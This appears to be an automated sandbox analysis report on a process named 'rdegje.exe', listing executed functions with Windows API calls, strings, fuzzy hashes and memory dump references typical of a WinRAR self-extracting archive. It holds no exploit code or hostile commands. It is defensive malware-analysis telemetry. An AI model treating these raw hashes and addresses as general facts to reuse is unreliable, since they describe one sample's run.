Snapshot File: hcaresult_2_2_de0000_3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 574e3909e5bd5c3c5f202ede80a9405a59f1a2f3caee1bd9d4970071fdf11126
Instruction ID: cebb4ed9154493e8ee551320618d2c987c6ad42269ee4048aea873a9de83aeb8
Opcode Fuzzy Hash: 574e3909e5bd5c3c5f202ede80a9405a59f1a2f3caee1bd9d4970071fdf11126
Instruction Fuzzy Hash: 6E41F272D043958FCB04EFBAD84429EBBF1EF89310F18856AD948A7351DB389945CBE1

Function 00DE7CB8 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00DE811A), ref: 00DE8207

Memory Dump Source

Source File: 00000002.00000002.4148964631.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_de0000_3.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 366d279761a6f5a4e783d0ab5b195344ff67f90882eae5e59f09ab4cd7dff5f2
Instruction ID: 2d9675b71adf086c4f4eee18813aaf317dec866768b37549fab53d1c1bc96bfb
Opcode Fuzzy Hash: 366d279761a6f5a4e783d0ab5b195344ff67f90882eae5e59f09ab4cd7dff5f2
Instruction Fuzzy Hash: 3C1100B1C00669DFCB10DF9AC544B9EFBB4AB48320F24816AE958A7250D778A944CFA5

Function 00DE8198 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00DE811A), ref: 00DE8207

Memory Dump Source

Source File: 00000002.00000002.4148964631.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_de0000_3.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 1797ee250183c54926dcf419c25230001e1ef0b763fb57d7969e712695fc6929
Instruction ID: 02de5512ada21657e8d121a9c8186f5ba4e252fd165273ab278c73fad3eb92cf
Opcode Fuzzy Hash: 1797ee250183c54926dcf419c25230001e1ef0b763fb57d7969e712695fc6929
Instruction Fuzzy Hash: 5D1142B2C00659CBCB10CF9AC644BDEFBF4AF08320F24816AD458B7210D778A940CFA5

Analysis Process: rdegje.exePID: 7724, Parent PID: 7308COMMON

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1582
Total number of Limit Nodes:	33

Executed Functions

Function 00EEF05C Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 202
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EE1B83: GetModuleHandleW.KERNEL32(kernel32), ref: 00EE1B9C
Part of subcall function 00EE1B83: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00EE1BAE
Part of subcall function 00EE1B83: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00EE1BDF

Part of subcall function 00EEB65D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00EEB665

Part of subcall function 00EEBD1B: OleInitialize.OLE32(00000000), ref: 00EEBD34
Part of subcall function 00EEBD1B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00EEBD6B
Part of subcall function 00EEBD1B: SHGetMalloc.SHELL32(00F1A460), ref: 00EEBD75

GetCommandLineW.KERNEL32 ref: 00EEF09B
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00EEF0C5
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00EEF0D6
UnmapViewOfFile.KERNEL32(00000000), ref: 00EEF127

Part of subcall function 00EEED2E: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00EEED44
Part of subcall function 00EEED2E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00EEED80

Part of subcall function 00EE0752: _wcslen.LIBCMT ref: 00EE0776

CloseHandle.KERNEL32(00000000), ref: 00EEF12E
GetModuleFileNameW.KERNEL32(00000000,00F30CC0,00000800), ref: 00EEF148
SetEnvironmentVariableW.KERNEL32(sfxname,00F30CC0), ref: 00EEF154
GetLocalTime.KERNEL32(?), ref: 00EEF15F
_swprintf.LIBCMT ref: 00EEF19E
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00EEF1B3
GetModuleHandleW.KERNEL32(00000000), ref: 00EEF1BA
LoadIconW.USER32(00000000,00000064), ref: 00EEF1D1
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9D0,00000000), ref: 00EEF222
Sleep.KERNEL32(?), ref: 00EEF250
DeleteObject.GDI32 ref: 00EEF289
DeleteObject.GDI32(?), ref: 00EEF299
CloseHandle.KERNEL32 ref: 00EEF2DC

Strings

sfxstime, xrefs: 00EEF1AE
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00EEF18F
winrarsfxmappingfile.tmp, xrefs: 00EEF0B9
STARTDLG, xrefs: 00EEF217
sfxname, xrefs: 00EEF14F

Memory Dump Source

Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3014515783-3710569615
Opcode ID: 5f345bea0f47dbe96fbc39ec3d879d33413965f4625cf4b2f314540f0450621c
Instruction ID: d557ef885b3ac5ec13337d9dd5233087287fb51ffa45f7b7f3a982d5dc22f84e
Opcode Fuzzy Hash: 5f345bea0f47dbe96fbc39ec3d879d33413965f4625cf4b2f314540f0450621c
Instruction Fuzzy Hash: 9461FDB150138CABD321AB62EC49FAB7BDCFB49754F011029F641F22A2DB749D44E762

Function 00ED92C6 Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1157COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00ED92CB

Part of subcall function 00EDD656: _wcsrchr.LIBVCRUNTIME ref: 00EDD660

Part of subcall function 00EDCAA0: _wcslen.LIBCMT ref: 00EDCAA6

Part of subcall function 00EE1907: _wcslen.LIBCMT ref: 00EE190D

Part of subcall function 00EDB5D6: _wcslen.LIBCMT ref: 00EDB5E2
Part of subcall function 00EDB5D6: __aulldiv.LIBCMT ref: 00EDB60E
Part of subcall function 00EDB5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00EDB615
Part of subcall function 00EDB5D6: _swprintf.LIBCMT ref: 00EDB640
Part of subcall function 00EDB5D6: _wcslen.LIBCMT ref: 00EDB64A
Part of subcall function 00EDB5D6: _swprintf.LIBCMT ref: 00EDB6A0
Part of subcall function 00EDB5D6: _wcslen.LIBCMT ref: 00EDB6AA

Part of subcall function 00ED4727: __EH_prolog.LIBCMT ref: 00ED472C

Part of subcall function 00EDA212: __EH_prolog.LIBCMT ref: 00EDA217

Part of subcall function 00EDB8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00EDB5B5,?,?,?,00EDB405,?,00000001,00000000,?,?), ref: 00EDB8FA
Part of subcall function 00EDB8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00EDB5B5,?,?,?,00EDB405,?,00000001,00000000,?,?), ref: 00EDB92B

Strings

__tmp_reference_source_, xrefs: 00ED9596

Memory Dump Source

Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd

Similarity

API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
String ID: __tmp_reference_source_
API String ID: 70197177-685763994
Opcode ID: 45d01729da86e390fd0a37bb67ed295912be6963bb420c1ff9562dbefad2ce29
Instruction ID: 8fe54b9615ba1d1d1ffd382b5166ee78228971cc8fc2784386f538e06ad7635f
Opcode Fuzzy Hash: 45d01729da86e390fd0a37bb67ed295912be6963bb420c1ff9562dbefad2ce29
Instruction Fuzzy Hash: 23A2E571904245AEDF15DF64CC95BE9BBA4EF05308F0821BBE949BB383D7309A46CB61

Function 00EF91B0 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00EF9186,?,00F0D570,0000000C,00EF92DD,?,00000002,00000000), ref: 00EF91D1
TerminateProcess.KERNEL32(00000000,?,00EF9186,?,00F0D570,0000000C,00EF92DD,?,00000002,00000000), ref: 00EF91D8
ExitProcess.KERNEL32 ref: 00EF91EA

Memory Dump Source

Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: feb06be886813fbda10df65aa9737a3bc33583c6d62ecea5363197d02c0fb804
Instruction ID: cc6e8304fe255ada692b3f5df36a94f4e35aa39ae10e7ef99717c6a7878bb3f0
Opcode Fuzzy Hash: feb06be886813fbda10df65aa9737a3bc33583c6d62ecea5363197d02c0fb804
Instruction Fuzzy Hash: 40E0463100010CABDF126F60DD08A693B6AFB40342F014024FF88AB132CB36ED82DA80

Function 00EDB20A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00EDE79B,00000001,?,?,?,00000000,00EE66C2,?,?,?), ref: 00EDB22E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00EE66C2,?,?,?,?,?,00EE6184,?), ref: 00EDB275
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00EDE79B,00000001,?,?), ref: 00EDB2A1

Memory Dump Source

Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 787a88a2d782b620e3f46de9a0fbf5f3e7bf49170a081f881f70c1b7f339d8a6
Instruction ID: f0920ca23aeddd79d6efe5be5b15be63cee8a9de96b51c615f1186d8c69817ce
Opcode Fuzzy Hash: 787a88a2d782b620e3f46de9a0fbf5f3e7bf49170a081f881f70c1b7f339d8a6
Instruction Fuzzy Hash: 5B31D372248305EFDB14CF10D808BAE77A5FB80719F01151EF581773A0DB74A94ADBA2

Function 00EFC12C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 00EFC19D

Strings

LCMapStringEx, xrefs: 00EFC13D, 00EFC147

Memory Dump Source

Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 8f7119dcbeecf6cef2d60fa1fcb6c911c961cab25fcc86a49ca3f031ef89b833
Instruction ID: 687962bd7f4687cfd0cf6b61af68f562efac56f649dfb564056f3ed53f833915
Opcode Fuzzy Hash: 8f7119dcbeecf6cef2d60fa1fcb6c911c961cab25fcc86a49ca3f031ef89b833
Instruction Fuzzy Hash: D301133260120CBBCF02AF90DD01DEE3FA2EB08760F555115FF08261A1CB369971BB81

Function 00EFC0CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00EFB72F), ref: 00EFC115

Strings

InitializeCriticalSectionEx, xrefs: 00EFC0DB, 00EFC0E5

Memory Dump Source

Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: af2d00324fbf302409f283294d2f4ad01391cf47656aed46079dd260f2173ad8
Instruction ID: 1f82569d71ad1ebb993aa9d1536ba2f6b802d8914156f443a53633bb9c5995bd
Opcode Fuzzy Hash: af2d00324fbf302409f283294d2f4ad01391cf47656aed46079dd260f2173ad8
Instruction Fuzzy Hash: 3EF0BE71B4121CBBCB11AF50CD06CAE7FA1EB187A0B505025FE096A2A1CF769D21BB81

Function 00EDB032 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00ED7ED0,?,?,?,00000000), ref: 00EDB04C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00EDB100

Memory Dump Source

Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 4818617c38d5f53217332a4a3b5411f368e5afc41656e61d64065828d9cafa3c
Instruction ID: 28f8d02f3a3be367f612ca27870367002328a32101e5d3e080f68bb5c986bbc1
Opcode Fuzzy Hash: 4818617c38d5f53217332a4a3b5411f368e5afc41656e61d64065828d9cafa3c
Instruction Fuzzy Hash: FE213631248245DFC710DE35C491AABBBE8EF51308F05191EF4E093251E72AE90DDB62

Function 00EDB110 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00EDB157
GetLastError.KERNEL32 ref: 00EDB164

Memory Dump Source

Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 200a91f9195eb6162e47a0b62b640a02c2cfa8877c84918f2c3aaeb91b8dc188
Instruction ID: fc73ad0f600e7a34b7e3aca62dfc98c82cac8fb3f96ba554cdbf9b9a5d1f4cab
Opcode Fuzzy Hash: 200a91f9195eb6162e47a0b62b640a02c2cfa8877c84918f2c3aaeb91b8dc188
Instruction Fuzzy Hash: F311CE31601710EBD7259A28C854BA6B3E9FB04364F61576AE1A2B33D0F770AD46D650

Function 00EEF002 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00EEF02C

Part of subcall function 00ED4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED4A33

SetDlgItemTextW.USER32(00000065,?), ref: 00EEF043

Part of subcall function 00EEC758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EEC769
Part of subcall function 00EEC758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EEC77A
Part of subcall function 00EEC758: IsDialogMessageW.USER32(00050456,?), ref: 00EEC78E
Part of subcall function 00EEC758: TranslateMessage.USER32(?), ref: 00EEC79C
Part of subcall function 00EEC758: DispatchMessageW.USER32(?), ref: 00EEC7A6

Memory Dump Source

Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 4e9ef2761bd40f52448ca16447750f6d54ffa133b5ed078ad18afb7dde1c863e
Instruction ID: d1002d0dec1e88aafaeee8d795f5b9cbdcf1f56d09c3145b9ea7f2bfb9fbe820
Opcode Fuzzy Hash: 4e9ef2761bd40f52448ca16447750f6d54ffa133b5ed078ad18afb7dde1c863e
Instruction Fuzzy Hash: 25E0227680428C36DF01A7A1EC0AFEA3AECAB04389F041462B201A60B2D6B486119B62

Function 00ED12D1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00ED12E6
ShowWindow.USER32(00000000), ref: 00ED12ED

Memory Dump Source

Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 3136d8e5b6fbfb873436447812b9c83187c64a8ce3693bc0d340cde8013d55b2
Instruction ID: 398b492aa6a39a332a1d7e88dec60f9f63188c8cbd1f5ce09017651bba62acd8
Opcode Fuzzy Hash: 3136d8e5b6fbfb873436447812b9c83187c64a8ce3693bc0d340cde8013d55b2
Instruction Fuzzy Hash: E3C01232058604BECB011B70DC09D2E7BA9ABD4621F10C904F0A5C1060C239C010EB11

Function 00ED42F1 Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00ED42F6

Memory Dump Source

Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ea6e9b1c3a1fb247ad26643c7ceabbdd3486cf6dc3789263f07eeea9248ac35f
Instruction ID: 36665e82c1fc078de74984cc65daa68d183ac7ee3b9c6e684aab38b5cbf4d79c
Opcode Fuzzy Hash: ea6e9b1c3a1fb247ad26643c7ceabbdd3486cf6dc3789263f07eeea9248ac35f
Instruction Fuzzy Hash: 6371B0B1504B859FCB25EB74D851AE7B7E8FF25300F04296FA2AB62281DB707645CB11

Function 00ED90A2 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00ED90A7

Part of subcall function 00ED13F8: __EH_prolog.LIBCMT ref: 00ED13FD

Part of subcall function 00ED2032: __EH_prolog.LIBCMT ref: 00ED2037

Part of subcall function 00EDB966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00EDB991

Memory Dump Source

Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 2af5ab8a6509ae8f1bb1c18ce0c4ce457709005154cff0383158164f65a141bf
Instruction ID: 9a794eb72db1196b19c28bb7020356d1573f3a3e2e8448f6c97fb1a0aba66a35
Opcode Fuzzy Hash: 2af5ab8a6509ae8f1bb1c18ce0c4ce457709005154cff0383158164f65a141bf
Instruction Fuzzy Hash: 1841A271904258AADB24DB60CCA5AEA73B9EF10344F0410EBE18A73293DB755F8ACF10

Function 00EFC2F6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EFA543,00000001,00000364,?,00EF53FD,?,?,00F130C4), ref: 00EFC337

Memory Dump Source

Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 171d7628afd674fea46deb10d523993eceb63588e53ece3a2cf22b7c854b80c0
Instruction ID: 22e6ac466b9800ca270ec334c06fc1d489111dd11307be89d1fb8c5226b43e59
Opcode Fuzzy Hash: 171d7628afd674fea46deb10d523993eceb63588e53ece3a2cf22b7c854b80c0
Instruction Fuzzy Hash: D6F0BB3160612CA6DB211A25DF01AB637889F817E1B34E091AA09FB090DA30D90095E1

Function 00EE2128 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00EE215D

Memory Dump Source

Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true

